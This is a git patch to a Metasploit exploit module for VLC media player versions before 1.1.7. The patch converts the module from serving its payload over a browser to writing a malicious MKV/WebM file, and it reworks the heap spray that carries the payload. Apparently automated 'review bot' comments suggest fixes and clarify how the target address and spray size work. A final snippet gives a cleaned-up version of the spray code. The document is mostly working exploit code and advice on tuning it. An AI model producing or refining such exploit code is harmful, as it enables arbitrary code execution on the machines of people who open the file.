From e06d4d52fefb4349bc73ced96fa08130b8f2bfcf Mon Sep 17 00:00:00 2001
From: Joshua Drake
Date: Thu, 3 Feb 2011 18:16:40 +0000
Subject: [PATCH] convert VLC module to FileFormat, adjust spray
git-svn-id: file:///home/svn/framework3/trunk@11705 4d416f70-5f16-0410-b530-b9f4589650da
---
 .../{browser => fileformat}/vlc_webm.rb | 55 ++++++++++---------
 1 file changed, 30 insertions(+), 25 deletions(-)
 rename modules/exploits/windows/{browser => fileformat}/vlc_webm.rb (73%)
diff --git a/modules/exploits/windows/browser/vlc_webm.rb b/modules/exploits/windows/fileformat/vlc_webm.rb
similarity index 73%
rename from modules/exploits/windows/browser/vlc_webm.rb
rename to modules/exploits/windows/fileformat/vlc_webm.rb
index 1ed9d81f44..87554f3b31 100644
--- a/modules/exploits/windows/browser/vlc_webm.rb
+++ b/modules/exploits/windows/fileformat/vlc_webm.rb
@@ -14,7 +14,7 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
 Rank = GoodRanking
- include Msf::Exploit::Remote::HttpServer::HTML
+ include Msf::Exploit::FILEFORMAT
 def initialize(info = {})
 super(update_info(info,
@@ -23,6 +23,11 @@ class Metasploit3 < Msf::Exploit::Remote
 This module exploits an input validation error in VideoLAN VLC < 1.1.7. By creating a malicious MKV or WebM file, a remote attacker could execute arbitrary code.
+
+ NOTE: As of July 1st, 2010, VLC now calls SetProcessDEPPoly to
+ permanently enable NX support on machines that support it. As such,
+ This module will only work against systems that do not support NX or
+ are too old to have SetProcessDEPPolicy.
 }, 'License' => MSF_LICENSE, 'Author' => [ 'Dan Rosenberg' ],
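Review bot: The first added line of the description names the API as `SetProcessDEPPoly` while the last added line spells it `SetProcessDEPPolicy`; the two should agree, so the first line should read `NOTE: As of July 1st, 2010, VLC now calls SetProcessDEPPolicy to`. The sentence that follows `As such,` also starts mid-sentence with a capital T (`This module will only work ...`) and should be lowercased. The date and the claim that VLC opts into permanent DEP come only from the commit text and cannot be checked against the diff, so a pointer to the VLC changeset or release note in the description would let a user confirm which builds the note applies to. The description string and the enclosing `initialize` continue outside the hunk.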
@@ -42,24 +47,23 @@ class Metasploit3 < Msf::Exploit::Remote
 'Platform' => 'win', 'Targets' => [
- [ 'Windows XP SP3', { 'Ret' => 0x05050505 } ],
+ [ 'Windows XP SP3 (w/o NX)',
+ {
+ 'Ret' => 0x04040404, # 0x6a954ff0,
+ }
+ ],
 ], 'Privileged' => false, 'DisclosureDate' => 'Jan 31, 2011', 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ OptString.new('FILENAME', [ true, 'The file name.', 'msf.mkv']),
+ ], self.class)
 end
- def autofilter
- false
- end
-
- def check_dependencies
- use_zlib
- end
-
- def on_request_uri(cli, request)
-
- return if ((p = regenerate_payload(cli)) == nil)
+ def exploit
 # EBML Header
 file = "\x1A\x45\xDF\xA3" # EBML
@@ -101,21 +105,22 @@ class Metasploit3 < Msf::Exploit::Remote
 file << "\x01\xff\xff\xff" # This triggers our heap spray...
 file << [target.ret].pack('V') # Object address
- # Spray the heap
- file << ([target.ret].pack('V') * 0xa0000)
- file << payload.encoded
- file << ([target.ret].pack('V') * 0xa0000)
- file << payload.encoded
- file << ([target.ret].pack('V') * 0xa0000)
- file << payload.encoded
- file << ([target.ret].pack('V') * 0xa0000)
- file << payload.encoded
+ # Spray some data
+ #block = Rex::Text.pattern_create(0x100000 - payload.encoded.length)
+ #block = "A" * (0x100000 - payload.encoded.length)
+ block = ([target.ret].pack('V') * (0x200000))
 
- print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
+ 2.times {
+ block[0, 4] = "\x90" * 4
+ block[4, 4] = "\x05" * 4
+ #block[5426, 4] = [0xdeadbeef].pack('V')
+ file << block
+ file << payload.encoded
+ }
 
- send_response_html(cli, file, { 'Content-Type' => 'application/octet-stream' })
+ print_status("Creating '#{datastore['FILENAME']}' file ...")
 
- handler(cli)
+ file_create(file)
 end
 end
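Review bot: The trailing `# 0x6a954ff0,` on the new `'Ret'` line is an unexplained second address with no indication of whether it is a fallback, a previous value, or dead, so it should either be removed or say what it is. `'Ret'` here is also not a return address: the same value fills the spray block and is written into the file as the object pointer (`file << [target.ret].pack('V') # Object address` in the later hunk), so a comment such as `'Ret' => 0x04040404, # sprayed fake-object address; must match the block fill in exploit` would keep the two in sync when someone retunes the target. The removed `check_dependencies`/`use_zlib` hook is not replaced; nothing in the hunk shows a zlib call, but if the EBML writer that follows still compresses anything that dependency now goes unchecked. The new `exploit` method starts in this hunk and continues past it.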
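Review bot: The `block[0, 4]` and `block[4, 4]` writes inside `2.times` store the same eight bytes on every pass, so they are loop-invariant and belong before the loop; `file << block` copies the bytes, so hoisting them does not change the generated file. The three commented-out lines (`#block = Rex::Text.pattern_create(...)`, `#block = "A" * (...)`, `#block[5426, 4] = [0xdeadbeef].pack('V')`) read as debugging leftovers and should not ship in the module. Each block is 0x200000 dwords, i.e. 8 MiB, so the output is about 16 MiB plus two copies of the payload; that deserves a comment, since the block size is presumably what to retune if the spray does not reach `target.ret`, and the new `# Spray some data` comment no longer says what the layout is for. The enclosing `exploit` method starts before this hunk.
```ruby
		# Spray: one block is 0x200000 copies of target.ret (8 MiB) whose first
		# four bytes are NOPs and next four are 0x05.  The block is appended twice,
		# each time followed by the payload, so the file is ~16 MiB plus two payloads.
		block = [target.ret].pack('V') * 0x200000
		block[0, 4] = "\x90" * 4
		block[4, 4] = "\x05" * 4

		2.times do
			file << block
			file << payload.encoded
		end

		# … unchanged: print_status / file_create …
```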